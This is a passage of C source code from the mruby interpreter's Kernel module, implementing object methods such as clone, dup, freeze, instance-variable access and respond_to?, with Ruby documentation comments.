NOEX_NOSUPER = 0x01,
NOEX_PRIVATE = 0x02,
NOEX_PROTECTED = 0x04,
NOEX_MASK = 0x06,
NOEX_BASIC = 0x08,
NOEX_UNDEF = NOEX_NOSUPER,
NOEX_MODFUNC = 0x12,
NOEX_SUPER = 0x20,
NOEX_VCALL = 0x40,
NOEX_RESPONDS = 0x80
} mrb_method_flag_t;
MRB_API mrb_bool
mrb_func_basic_p(mrb_state *mrb, mrb_value obj, mrb_sym mid, mrb_func_t func)
{
mrb_method_t m = mrb_method_search(mrb, mrb_class(mrb, obj), mid);
struct RProc *p;
if (MRB_METHOD_UNDEF_P(m)) return FALSE;
if (MRB_METHOD_FUNC_P(m))
return MRB_METHOD_FUNC(m) == func;
p = MRB_METHOD_PROC(m);
if (MRB_PROC_CFUNC_P(p) && (MRB_PROC_CFUNC(p) == func))
return TRUE;
return FALSE;
}
static mrb_bool
mrb_obj_basic_to_s_p(mrb_state *mrb, mrb_value obj)
{
return mrb_func_basic_p(mrb, obj, mrb_intern_lit(mrb, "to_s"), mrb_any_to_s);
}
/* 15.3.1.3.17 */
/*
* call-seq:
* obj.inspect -> string
*
* Returns a string containing a human-readable representation of
* <i>obj</i>. If not overridden and there are no instance variables, uses
* the <code>to_s</code> method to generate the string.
*
* [ 1, 2, 3..4, 'five' ].inspect #=> "[1, 2, 3..4, \"five\"]"
* Time.new.inspect #=> "2008-03-08 19:43:39 +0900"
*/
MRB_API mrb_value
mrb_obj_inspect(mrb_state *mrb, mrb_value obj)
{
if ((mrb_type(obj) == MRB_TT_OBJECT) && mrb_obj_basic_to_s_p(mrb, obj)) {
return mrb_obj_iv_inspect(mrb, mrb_obj_ptr(obj));
}
return mrb_any_to_s(mrb, obj);
}
/* 15.3.1.3.2 */
/*
* call-seq:
* obj === other -> true or false
*
* Case Equality---For class <code>Object</code>, effectively the same
* as calling <code>#==</code>, but typically overridden by descendants
* to provide meaningful semantics in <code>case</code> statements.
*/
static mrb_value
mrb_equal_m(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "o", &arg);
return mrb_bool_value(mrb_equal(mrb, self, arg));
}
/* 15.3.1.3.3 */
/* 15.3.1.3.33 */
/*
* Document-method: __id__
* Document-method: object_id
*
* call-seq:
* obj.__id__ -> fixnum
* obj.object_id -> fixnum
*
* Returns an integer identifier for <i>obj</i>. The same number will
* be returned on all calls to <code>id</code> for a given object, and
* no two active objects will share an id.
* <code>Object#object_id</code> is a different concept from the
* <code>:name</code> notation, which returns the symbol id of
* <code>name</code>. Replaces the deprecated <code>Object#id</code>.
*/
mrb_value
mrb_obj_id_m(mrb_state *mrb, mrb_value self)
{
return mrb_fixnum_value(mrb_obj_id(self));
}
/* 15.3.1.2.2 */
/* 15.3.1.2.5 */
/* 15.3.1.3.6 */
/* 15.3.1.3.25 */
/*
* call-seq:
* block_given? -> true or false
* iterator? -> true or false
*
* Returns <code>true</code> if <code>yield</code> would execute a
* block in the current context. The <code>iterator?</code> form
* is mildly deprecated.
*
* def try
* if block_given?
* yield
* else
* "no block"
* end
* end
* try #=> "no block"
* try { "hello" } #=> "hello"
* try do "hello" end #=> "hello"
*/
static mrb_value
mrb_f_block_given_p_m(mrb_state *mrb, mrb_value self)
{
mrb_callinfo *ci = &mrb->c->ci[-1];
mrb_callinfo *cibase = mrb->c->cibase;
mrb_value *bp;
struct RProc *p;
if (ci <= cibase) {
/* toplevel does not have block */
return mrb_false_value();
}
p = ci->proc;
/* search method/class/module proc */
while (p) {
if (MRB_PROC_SCOPE_P(p)) break;
p = p->upper;
}
if (p == NULL) return mrb_false_value();
/* search ci corresponding to proc */
while (cibase < ci) {
if (ci->proc == p) break;
ci--;
}
if (ci == cibase) {
return mrb_false_value();
}
else if (ci->env) {
struct REnv *e = ci->env;
int bidx;
/* top-level does not have block slot (always false) */
if (e->stack == mrb->c->stbase)
return mrb_false_value();
/* use saved block arg position */
bidx = MRB_ENV_BIDX(e);
/* bidx may be useless (e.g. define_method) */
if (bidx >= MRB_ENV_STACK_LEN(e))
return mrb_false_value();
bp = &e->stack[bidx];
}
else {
bp = ci[1].stackent+1;
if (ci->argc >= 0) {
bp += ci->argc;
}
else {
bp++;
}
}
if (mrb_nil_p(*bp))
return mrb_false_value();
return mrb_true_value();
}
/* 15.3.1.3.7 */
/*
* call-seq:
* obj.class -> class
*
* Returns the class of <i>obj</i>. This method must always be
* called with an explicit receiver, as <code>class</code> is also a
* reserved word in Ruby.
*
* 1.class #=> Fixnum
* self.class #=> Object
*/
static mrb_value
mrb_obj_class_m(mrb_state *mrb, mrb_value self)
{
return mrb_obj_value(mrb_obj_class(mrb, self));
}
static struct RClass*
mrb_singleton_class_clone(mrb_state *mrb, mrb_value obj)
{
struct RClass *klass = mrb_basic_ptr(obj)->c;
if (klass->tt != MRB_TT_SCLASS)
return klass;
else {
/* copy singleton(unnamed) class */
struct RClass *clone = (struct RClass*)mrb_obj_alloc(mrb, klass->tt, mrb->class_class);
switch (mrb_type(obj)) {
case MRB_TT_CLASS:
case MRB_TT_SCLASS:
break;
default:
clone->c = mrb_singleton_class_clone(mrb, mrb_obj_value(klass));
break;
}
clone->super = klass->super;
if (klass->iv) {
mrb_iv_copy(mrb, mrb_obj_value(clone), mrb_obj_value(klass));
mrb_obj_iv_set(mrb, (struct RObject*)clone, mrb_intern_lit(mrb, "__attached__"), obj);
}
if (klass->mt) {
clone->mt = kh_copy(mt, mrb, klass->mt);
}
else {
clone->mt = kh_init(mt, mrb);
}
clone->tt = MRB_TT_SCLASS;
return clone;
}
}
static void
copy_class(mrb_state *mrb, mrb_value dst, mrb_value src)
{
struct RClass *dc = mrb_class_ptr(dst);
struct RClass *sc = mrb_class_ptr(src);
/* if the origin is not the same as the class, then the origin and
the current class need to be copied */
if (sc->flags & MRB_FLAG_IS_PREPENDED) {
struct RClass *c0 = sc->super;
struct RClass *c1 = dc;
/* copy prepended iclasses */
while (!(c0->flags & MRB_FLAG_IS_ORIGIN)) {
c1->super = mrb_class_ptr(mrb_obj_dup(mrb, mrb_obj_value(c0)));
c1 = c1->super;
c0 = c0->super;
}
c1->super = mrb_class_ptr(mrb_obj_dup(mrb, mrb_obj_value(c0)));
c1->super->flags |= MRB_FLAG_IS_ORIGIN;
}
if (sc->mt) {
dc->mt = kh_copy(mt, mrb, sc->mt);
}
else {
dc->mt = kh_init(mt, mrb);
}
dc->super = sc->super;
MRB_SET_INSTANCE_TT(dc, MRB_INSTANCE_TT(sc));
}
static void
init_copy(mrb_state *mrb, mrb_value dest, mrb_value obj)
{
switch (mrb_type(obj)) {
case MRB_TT_CLASS:
case MRB_TT_MODULE:
copy_class(mrb, dest, obj);
mrb_iv_copy(mrb, dest, obj);
mrb_iv_remove(mrb, dest, mrb_intern_lit(mrb, "__classname__"));
break;
case MRB_TT_OBJECT:
case MRB_TT_SCLASS:
case MRB_TT_HASH:
case MRB_TT_DATA:
case MRB_TT_EXCEPTION:
mrb_iv_copy(mrb, dest, obj);
break;
case MRB_TT_ISTRUCT:
mrb_istruct_copy(dest, obj);
break;
default:
break;
}
mrb_funcall(mrb, dest, "initialize_copy", 1, obj);
}
/* 15.3.1.3.8 */
/*
* call-seq:
* obj.clone -> an_object
*
* Produces a shallow copy of <i>obj</i>---the instance variables of
* <i>obj</i> are copied, but not the objects they reference. Copies
* the frozen state of <i>obj</i>. See also the discussion
* under <code>Object#dup</code>.
*
* class Klass
* attr_accessor :str
* end
* s1 = Klass.new #=> #<Klass:0x401b3a38>
* s1.str = "Hello" #=> "Hello"
* s2 = s1.clone #=> #<Klass:0x401b3998 @str="Hello">
* s2.str[1,4] = "i" #=> "i"
* s1.inspect #=> "#<Klass:0x401b3a38 @str=\"Hi\">"
* s2.inspect #=> "#<Klass:0x401b3998 @str=\"Hi\">"
*
* This method may have class-specific behavior. If so, that
* behavior will be documented under the #+initialize_copy+ method of
* the class.
*
* Some objects (instances of TrueClass, FalseClass, NilClass, Symbol, Fixnum and Float) cannot be cloned.
*/
MRB_API mrb_value
mrb_obj_clone(mrb_state *mrb, mrb_value self)
{
struct RObject *p;
mrb_value clone;
if (mrb_immediate_p(self)) {
mrb_raisef(mrb, E_TYPE_ERROR, "can't clone %S", self);
}
if (mrb_type(self) == MRB_TT_SCLASS) {
mrb_raise(mrb, E_TYPE_ERROR, "can't clone singleton class");
}
p = (struct RObject*)mrb_obj_alloc(mrb, mrb_type(self), mrb_obj_class(mrb, self));
p->c = mrb_singleton_class_clone(mrb, self);
mrb_field_write_barrier(mrb, (struct RBasic*)p, (struct RBasic*)p->c);
clone = mrb_obj_value(p);
init_copy(mrb, clone, self);
return clone;
}
/* 15.3.1.3.9 */
/*
* call-seq:
* obj.dup -> an_object
*
* Produces a shallow copy of <i>obj</i>---the instance variables of
* <i>obj</i> are copied, but not the objects they reference.
* <code>dup</code> copies the frozen state of <i>obj</i>. See also
* the discussion under <code>Object#clone</code>. In general,
* <code>clone</code> and <code>dup</code> may have different semantics
* in descendant classes. While <code>clone</code> is used to duplicate
* an object, including its internal state, <code>dup</code> typically
* uses the class of the descendant object to create the new instance.
*
* This method may have class-specific behavior. If so, that
* behavior will be documented under the #+initialize_copy+ method of
* the class.
*/
MRB_API mrb_value
mrb_obj_dup(mrb_state *mrb, mrb_value obj)
{
struct RBasic *p;
mrb_value dup;
if (mrb_immediate_p(obj)) {
mrb_raisef(mrb, E_TYPE_ERROR, "can't dup %S", obj);
}
if (mrb_type(obj) == MRB_TT_SCLASS) {
mrb_raise(mrb, E_TYPE_ERROR, "can't dup singleton class");
}
p = mrb_obj_alloc(mrb, mrb_type(obj), mrb_obj_class(mrb, obj));
dup = mrb_obj_value(p);
init_copy(mrb, dup, obj);
return dup;
}
static mrb_value
mrb_obj_extend(mrb_state *mrb, mrb_int argc, mrb_value *argv, mrb_value obj)
{
mrb_int i;
if (argc == 0) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "wrong number of arguments (at least 1)");
}
for (i = 0; i < argc; i++) {
mrb_check_type(mrb, argv[i], MRB_TT_MODULE);
}
while (argc--) {
mrb_funcall(mrb, argv[argc], "extend_object", 1, obj);
mrb_funcall(mrb, argv[argc], "extended", 1, obj);
}
return obj;
}
/* 15.3.1.3.13 */
/*
* call-seq:
* obj.extend(module, ...) -> obj
*
* Adds to _obj_ the instance methods from each module given as a
* parameter.
*
* module Mod
* def hello
* "Hello from Mod.\n"
* end
* end
*
* class Klass
* def hello
* "Hello from Klass.\n"
* end
* end
*
* k = Klass.new
* k.hello #=> "Hello from Klass.\n"
* k.extend(Mod) #=> #<Klass:0x401b3bc8>
* k.hello #=> "Hello from Mod.\n"
*/
static mrb_value
mrb_obj_extend_m(mrb_state *mrb, mrb_value self)
{
mrb_value *argv;
mrb_int argc;
mrb_get_args(mrb, "*", &argv, &argc);
return mrb_obj_extend(mrb, argc, argv, self);
}
static mrb_value
mrb_obj_freeze(mrb_state *mrb, mrb_value self)
{
struct RBasic *b;
switch (mrb_type(self)) {
case MRB_TT_FALSE:
case MRB_TT_TRUE:
case MRB_TT_FIXNUM:
case MRB_TT_SYMBOL:
#ifndef MRB_WITHOUT_FLOAT
case MRB_TT_FLOAT:
#endif
return self;
default:
break;
}
b = mrb_basic_ptr(self);
if (!MRB_FROZEN_P(b)) {
MRB_SET_FROZEN_FLAG(b);
}
return self;
}
static mrb_value
mrb_obj_frozen(mrb_state *mrb, mrb_value self)
{
struct RBasic *b;
switch (mrb_type(self)) {
case MRB_TT_FALSE:
case MRB_TT_TRUE:
case MRB_TT_FIXNUM:
case MRB_TT_SYMBOL:
#ifndef MRB_WITHOUT_FLOAT
case MRB_TT_FLOAT:
#endif
return mrb_true_value();
default:
break;
}
b = mrb_basic_ptr(self);
if (!MRB_FROZEN_P(b)) {
return mrb_false_value();
}
return mrb_true_value();
}
/* 15.3.1.3.15 */
/*
* call-seq:
* obj.hash -> fixnum
*
* Generates a <code>Fixnum</code> hash value for this object. This
* function must have the property that <code>a.eql?(b)</code> implies
* <code>a.hash == b.hash</code>. The hash value is used by class
* <code>Hash</code>. Any hash value that exceeds the capacity of a
* <code>Fixnum</code> will be truncated before being used.
*/
MRB_API mrb_value
mrb_obj_hash(mrb_state *mrb, mrb_value self)
{
return mrb_fixnum_value(mrb_obj_id(self));
}
/* 15.3.1.3.16 */
static mrb_value
mrb_obj_init_copy(mrb_state *mrb, mrb_value self)
{
mrb_value orig;
mrb_get_args(mrb, "o", &orig);
if (mrb_obj_equal(mrb, self, orig)) return self;
if ((mrb_type(self) != mrb_type(orig)) || (mrb_obj_class(mrb, self) != mrb_obj_class(mrb, orig))) {
mrb_raise(mrb, E_TYPE_ERROR, "initialize_copy should take same class object");
}
return self;
}
MRB_API mrb_bool
mrb_obj_is_instance_of(mrb_state *mrb, mrb_value obj, struct RClass* c)
{
if (mrb_obj_class(mrb, obj) == c) return TRUE;
return FALSE;
}
/* 15.3.1.3.19 */
/*
* call-seq:
* obj.instance_of?(class) -> true or false
*
* Returns <code>true</code> if <i>obj</i> is an instance of the given
* class. See also <code>Object#kind_of?</code>.
*/
static mrb_value
obj_is_instance_of(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "C", &arg);
return mrb_bool_value(mrb_obj_is_instance_of(mrb, self, mrb_class_ptr(arg)));
}
/* 15.3.1.3.20 */
/*
* call-seq:
* obj.instance_variable_defined?(symbol) -> true or false
*
* Returns <code>true</code> if the given instance variable is
* defined in <i>obj</i>.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_defined?(:@a) #=> true
* fred.instance_variable_defined?("@b") #=> true
* fred.instance_variable_defined?("@c") #=> false
*/
static mrb_value
mrb_obj_ivar_defined(mrb_state *mrb, mrb_value self)
{
mrb_sym sym;
mrb_get_args(mrb, "n", &sym);
mrb_iv_check(mrb, sym);
return mrb_bool_value(mrb_iv_defined(mrb, self, sym));
}
/* 15.3.1.3.21 */
/*
* call-seq:
* obj.instance_variable_get(symbol) -> obj
*
* Returns the value of the given instance variable, or nil if the
* instance variable is not set. The <code>@</code> part of the
* variable name should be included for regular instance
* variables. Throws a <code>NameError</code> exception if the
* supplied symbol is not valid as an instance variable name.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_get(:@a) #=> "cat"
* fred.instance_variable_get("@b") #=> 99
*/
static mrb_value
mrb_obj_ivar_get(mrb_state *mrb, mrb_value self)
{
mrb_sym iv_name;
mrb_get_args(mrb, "n", &iv_name);
mrb_iv_check(mrb, iv_name);
return mrb_iv_get(mrb, self, iv_name);
}
/* 15.3.1.3.22 */
/*
* call-seq:
* obj.instance_variable_set(symbol, obj) -> obj
*
* Sets the instance variable named by <i>symbol</i> to
* <i>object</i>, thereby frustrating the efforts of the class's
* author to attempt to provide proper encapsulation. The variable
* did not have to exist prior to this call.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_set(:@a, 'dog') #=> "dog"
* fred.instance_variable_set(:@c, 'cat') #=> "cat"
* fred.inspect #=> "#<Fred:0x401b3da8 @a=\"dog\", @b=99, @c=\"cat\">"
*/
static mrb_value
mrb_obj_ivar_set(mrb_state *mrb, mrb_value self)
{
mrb_sym iv_name;
mrb_value val;
mrb_get_args(mrb, "no", &iv_name, &val);
mrb_iv_check(mrb, iv_name);
mrb_iv_set(mrb, self, iv_name, val);
return val;
}
/* 15.3.1.3.24 */
/* 15.3.1.3.26 */
/*
* call-seq:
* obj.is_a?(class) -> true or false
* obj.kind_of?(class) -> true or false
*
* Returns <code>true</code> if <i>class</i> is the class of
* <i>obj</i>, or if <i>class</i> is one of the superclasses of
* <i>obj</i> or modules included in <i>obj</i>.
*
* module M; end
* class A
* include M
* end
* class B < A; end
* class C < B; end
* b = B.new
* b.instance_of? A #=> false
* b.instance_of? B #=> true
* b.instance_of? C #=> false
* b.instance_of? M #=> false
* b.kind_of? A #=> true
* b.kind_of? B #=> true
* b.kind_of? C #=> false
* b.kind_of? M #=> true
*/
static mrb_value
mrb_obj_is_kind_of_m(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "C", &arg);
return mrb_bool_value(mrb_obj_is_kind_of(mrb, self, mrb_class_ptr(arg)));
}
KHASH_DECLARE(st, mrb_sym, char, FALSE)
KHASH_DEFINE(st, mrb_sym, char, FALSE, kh_int_hash_func, kh_int_hash_equal)
static void
method_entry_loop(mrb_state *mrb, struct RClass* klass, khash_t(st)* set)
{
khint_t i;
khash_t(mt) *h = klass->mt;
if (!h || kh_size(h) == 0) return;
for (i=0;i<kh_end(h);i++) {
if (kh_exist(h, i)) {
mrb_method_t m = kh_value(h, i);
if (MRB_METHOD_UNDEF_P(m)) continue;
kh_put(st, mrb, set, kh_key(h, i));
}
}
}
mrb_value
mrb_class_instance_method_list(mrb_state *mrb, mrb_bool recur, struct RClass* klass, int obj)
{
khint_t i;
mrb_value ary;
mrb_bool prepended = FALSE;
struct RClass* oldklass;
khash_t(st)* set = kh_init(st, mrb);
if (!recur && (klass->flags & MRB_FLAG_IS_PREPENDED)) {
MRB_CLASS_ORIGIN(klass);
prepended = TRUE;
}
oldklass = 0;
while (klass && (klass != oldklass)) {
method_entry_loop(mrb, klass, set);
if ((klass->tt == MRB_TT_ICLASS && !prepended) ||
(klass->tt == MRB_TT_SCLASS)) {
}
else {
if (!recur) break;
}
oldklass = klass;
klass = klass->super;
}
ary = mrb_ary_new_capa(mrb, kh_size(set));
for (i=0;i<kh_end(set);i++) {
if (kh_exist(set, i)) {
mrb_ary_push(mrb, ary, mrb_symbol_value(kh_key(set, i)));
}
}
kh_destroy(st, mrb, set);
return ary;
}
static mrb_value
mrb_obj_singleton_methods(mrb_state *mrb, mrb_bool recur, mrb_value obj)
{
khint_t i;
mrb_value ary;
struct RClass* klass;
khash_t(st)* set = kh_init(st, mrb);
klass = mrb_class(mrb, obj);
if (klass && (klass->tt == MRB_TT_SCLASS)) {
method_entry_loop(mrb, klass, set);
klass = klass->super;
}
if (recur) {
while (klass && ((klass->tt == MRB_TT_SCLASS) || (klass->tt == MRB_TT_ICLASS))) {
method_entry_loop(mrb, klass, set);
klass = klass->super;
}
}
ary = mrb_ary_new(mrb);
for (i=0;i<kh_end(set);i++) {
if (kh_exist(set, i)) {
mrb_ary_push(mrb, ary, mrb_symbol_value(kh_key(set, i)));
}
}
kh_destroy(st, mrb, set);
return ary;
}
static mrb_value
mrb_obj_methods(mrb_state *mrb, mrb_bool recur, mrb_value obj, mrb_method_flag_t flag)
{
return mrb_class_instance_method_list(mrb, recur, mrb_class(mrb, obj), 0);
}
/* 15.3.1.3.31 */
/*
* call-seq:
* obj.methods -> array
*
* Returns a list of the names of methods publicly accessible in
* <i>obj</i>. This will include all the methods accessible in
* <i>obj</i>'s ancestors.
*
* class Klass
* def kMethod()
* end
* end
* k = Klass.new
* k.methods[0..9] #=> [:kMethod, :respond_to?, :nil?, :is_a?,
* # :class, :instance_variable_set,
* # :methods, :extend, :__send__, :instance_eval]
* k.methods.length #=> 42
*/
static mrb_value
mrb_obj_methods_m(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, (mrb_method_flag_t)0); /* everything but private */
}
/* 15.3.1.3.32 */
/*
* call-seq:
* nil.nil? -> true
* <anything_else>.nil? -> false
*
* Only the object <i>nil</i> responds <code>true</code> to <code>nil?</code>.
*/
static mrb_value
mrb_false(mrb_state *mrb, mrb_value self)
{
return mrb_false_value();
}
/* 15.3.1.3.36 */
/*
* call-seq:
* obj.private_methods(all=true) -> array
*
* Returns the list of private methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_private_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PRIVATE); /* private attribute not defined */
}
/* 15.3.1.3.37 */
/*
* call-seq:
* obj.protected_methods(all=true) -> array
*
* Returns the list of protected methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_protected_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PROTECTED); /* protected attribute not defined */
}
/* 15.3.1.3.38 */
/*
* call-seq:
* obj.public_methods(all=true) -> array
*
* Returns the list of public methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_public_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PUBLIC); /* public attribute not defined */
}
/* 15.3.1.2.12 */
/* 15.3.1.3.40 */
/*
* call-seq:
* raise
* raise(string)
* raise(exception [, string])
*
* With no arguments, raises a <code>RuntimeError</code>
* With a single +String+ argument, raises a
* +RuntimeError+ with the string as a message. Otherwise,
* the first parameter should be the name of an +Exception+
* class (or an object that returns an +Exception+ object when sent
* an +exception+ message). The optional second parameter sets the
* message associated with the exception, and the third parameter is an
* array of callback information. Exceptions are caught by the
* +rescue+ clause of <code>begin...end</code> blocks.
*
* raise "Failed to create socket"
* raise ArgumentError, "No parameters", caller
*/
MRB_API mrb_value
mrb_f_raise(mrb_state *mrb, mrb_value self)
{
mrb_value a[2], exc;
mrb_int argc;
argc = mrb_get_args(mrb, "|oo", &a[0], &a[1]);
switch (argc) {
case 0:
mrb_raise(mrb, E_RUNTIME_ERROR, "");
break;
case 1:
if (mrb_string_p(a[0])) {
a[1] = a[0];
argc = 2;
a[0] = mrb_obj_value(E_RUNTIME_ERROR);
}
/* fall through */
default:
exc = mrb_make_exception(mrb, argc, a);
mrb_exc_raise(mrb, exc);
break;
}
return mrb_nil_value(); /* not reached */
}
static mrb_value
mrb_krn_class_defined(mrb_state *mrb, mrb_value self)
{
mrb_value str;
mrb_get_args(mrb, "S", &str);
return mrb_bool_value(mrb_class_defined(mrb, RSTRING_PTR(str)));
}
/* 15.3.1.3.41 */
/*
* call-seq:
* obj.remove_instance_variable(symbol) -> obj
*
* Removes the named instance variable from <i>obj</i>, returning that
* variable's value.
*
* class Dummy
* attr_reader :var
* def initialize
* @var = 99
* end
* def remove
* remove_instance_variable(:@var)
* end
* end
* d = Dummy.new
* d.var #=> 99
* d.remove #=> 99
* d.var #=> nil
*/
static mrb_value
mrb_obj_remove_instance_variable(mrb_state *mrb, mrb_value self)
{
mrb_sym sym;
mrb_value val;
mrb_get_args(mrb, "n", &sym);
mrb_iv_check(mrb, sym);
val = mrb_iv_remove(mrb, self, sym);
if (mrb_undef_p(val)) {
mrb_name_error(mrb, sym, "instance variable %S not defined", mrb_sym2str(mrb, sym));
}
return val;
}
void
mrb_method_missing(mrb_state *mrb, mrb_sym name, mrb_value self, mrb_value args)
{
mrb_no_method_error(mrb, name, args, "undefined method '%S'", mrb_sym2str(mrb, name));
}
/* 15.3.1.3.30 */
/*
* call-seq:
* obj.method_missing(symbol [, *args] ) -> result
*
* Invoked by Ruby when <i>obj</i> is sent a message it cannot handle.
* <i>symbol</i> is the symbol for the method called, and <i>args</i>
* are any arguments that were passed to it. By default, the interpreter
* raises an error when this method is called. However, it is possible
* to override the method to provide more dynamic behavior.
* If it is decided that a particular method should not be handled, then
* <i>super</i> should be called, so that ancestors can pick up the
* missing method.
* The example below creates
* a class <code>Roman</code>, which responds to methods with names
* consisting of roman numerals, returning the corresponding integer
* values.
*
* class Roman
* def romanToInt(str)
* # ...
* end
* def method_missing(methId)
* str = methId.id2name
* romanToInt(str)
* end
* end
*
* r = Roman.new
* r.iv #=> 4
* r.xxiii #=> 23
* r.mm #=> 2000
*/
#ifdef MRB_DEFAULT_METHOD_MISSING
static mrb_value
mrb_obj_missing(mrb_state *mrb, mrb_value mod)
{
mrb_sym name;
mrb_value *a;
mrb_int alen;
mrb_get_args(mrb, "n*!", &name, &a, &alen);
mrb_method_missing(mrb, name, mod, mrb_ary_new_from_values(mrb, alen, a));
/* not reached */
return mrb_nil_value();
}
#endif
static inline mrb_bool
basic_obj_respond_to(mrb_state *mrb, mrb_value obj, mrb_sym id, int pub)
{
return mrb_respond_to(mrb, obj, id);
}
/* 15.3.1.3.43 */
/*
* call-seq:
* obj.respond_to?(symbol, include_private=false) -> true or false
*
* Returns +true+ if _obj_ responds to the given
* method. Private methods are included in the search only if the
* optional second parameter evaluates to +true+.
*
* If the method is not implemented,
* as Process.fork on Windows, File.lchmod on GNU/Linux, etc.,
* false is returned.
*
* If the method is not defined, <code>respond_to_missing?</code>
* method is called and the result is returned.
*/
static mrb_value
obj_respond_to(mrb_state *mrb, mrb_value self)
{
mrb_value mid;
mrb_sym id, rtm_id;
mrb_bool priv = FALSE, respond_to_p = TRUE;
mrb_get_args(mrb, "o|b", &mid, &priv);
if (mrb_symbol_p(mid)) {
id = mrb_symbol(mid);
}
else {
mrb_value tmp;
if (mrb_string_p(mid)) {
tmp = mrb_check_intern_str(mrb, mid);
}
else {
tmp = mrb_check_string_type(mrb, mid);
if (mrb_nil_p(tmp)) {
tmp = mrb_inspect(mrb, mid);
mrb_raisef(mrb, E_TYPE_ERROR, "%S is not a symbol", tmp);
}
tmp = mrb_check_intern_str(mrb, tmp);
}
if (mrb_nil_p(tmp)) {
respond_to_p = FALSE;
}
else {
id = mrb_symbol(tmp);
}
}
if (respond_to_p) {
respond_to_p = basic_obj_respond_to(mrb, self, id, !priv);
}
if (!respond_to_p) {
rtm_id = mrb_intern_lit(mrb, "respond_to_missing?");
if (basic_obj_respond_to(mrb, self, rtm_id, !priv)) {
mrb_value args[2], v;
args[0] = mid;
args[1] = mrb_bool_value(priv);
v = mrb_funcall_argv(mrb, self, rtm_id, 2, args);
return mrb_bool_value(mrb_bool(v));
}
}
return mrb_bool_value(respond_to_p);
}
/* 15.3.1.3.45 */
/*
* call-seq:
* obj.singleton_methods(all=true) -> array
*
* Returns an array of the names of singleton methods for <i>obj</i>.
* If the optional <i>all</i> parameter is true, the list will include
* methods in modules included in <i>obj</i>.
* Only public and protected singleton methods are returned.
*
* module Other
* def three() end
* end
*
* class Single
* def Single.four() end
* end
*
* a = Single.new
*
* def a.one()
* end
*
* class << a
* include Other
* def two()
* end
* end
*
* Single.singleton_methods #=> [:four]
* a.singleton_methods(false) #=> [:two, :one]
* a.singleton_methods #=> [:two, :one, :three]
*/
static mrb_value
mrb_obj_singleton_methods_m(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_singleton_methods(mrb, recur, self);
}
static mrb_value
mod_define_singleton_method(mrb_state *mrb, mrb_value self)
{
struct RProc *p;
mrb_method_t m;
mrb_sym mid;
mrb_value blk = mrb_nil_value();
mrb_get_args(mrb, "n&", &mid, &blk);
if (mrb_nil_p(blk)) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "no block given");
}
p = (struct RProc*)mrb_obj_alloc(mrb, MRB_TT_PROC, mrb->proc_class);
mrb_proc_copy(p, mrb_proc_ptr(blk));
p->flags |= MRB_PROC_STRICT;
MRB_METHOD_FROM_PROC(m, p);
mrb_define_method_raw(mrb, mrb_class_ptr(mrb_singleton_class(mrb, self)), mid, m);
return mrb_symbol_value(mid);
}
static mrb_value
mrb_obj_ceqq(mrb_state *mrb, mrb_value self)
{
mrb_value v;
mrb_int i, len;
mrb_sym eqq = mrb_intern_lit(mrb, "===");
mrb_value ary = mrb_ary_splat(mrb, self);
mrb_get_args(mrb, "o", &v);
len = RARRAY_LEN(ary);
for (i=0; i<len; i++) {
mrb_value c = mrb_funcall_argv(mrb, mrb_ary_entry(ary, i), eqq, 1, &v);
if (mrb_test(c)) return mrb_true_value();
}
return mrb_false_value();
}
/* 15.3.1.2.7 */
/*
* call-seq:
* local_variables -> array
*
* Returns the names of local variables in the current scope.
*
* [mruby limitation]
* If variable symbol information was stripped out from
* compiled binary files using `mruby-strip -l`, this
* method always returns an empty array.
*/
static mrb_value
mrb_local_variables(mrb_state *mrb, mrb_value self)
{
struct RProc *proc;
mrb_irep *irep;
mrb_value vars;
size_t i;
proc = mrb->c->ci[-1].proc;
if (MRB_PROC_CFUNC_P(proc)) {
return mrb_ary_new(mrb);
}
vars = mrb_hash_new(mrb);
while (proc) {
if (MRB_PROC_CFUNC_P(proc)) break;
irep = proc->body.irep;
if (!irep->lv) break;
for (i = 0; i + 1 < irep->nlocals; ++i) {
if (irep->lv[i].name) {
mrb_hash_set(mrb, vars, mrb_symbol_value(irep->lv[i].name), mrb_true_value());
}
}
if (!MRB_PROC_ENV_P(proc)) break;
proc = proc->upper;
//if (MRB_PROC_SCOPE_P(proc)) break;
if (!proc->c) break;
}
return mrb_hash_keys(mrb, vars);
}
mrb_value mrb_obj_equal_m(mrb_state *mrb, mrb_value);
void
mrb_init_kernel(mrb_state *mrb)
{
struct RClass *krn;
mrb->kernel_module = krn = mrb_define_module(mrb, "Kernel"); /* 15.3.1 */
mrb_define_class_method(mrb, krn, "block_given?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.2.2 */
mrb_define_class_method(mrb, krn, "global_variables", mrb_f_global_variables, MRB_ARGS_NONE()); /* 15.3.1.2.4 */
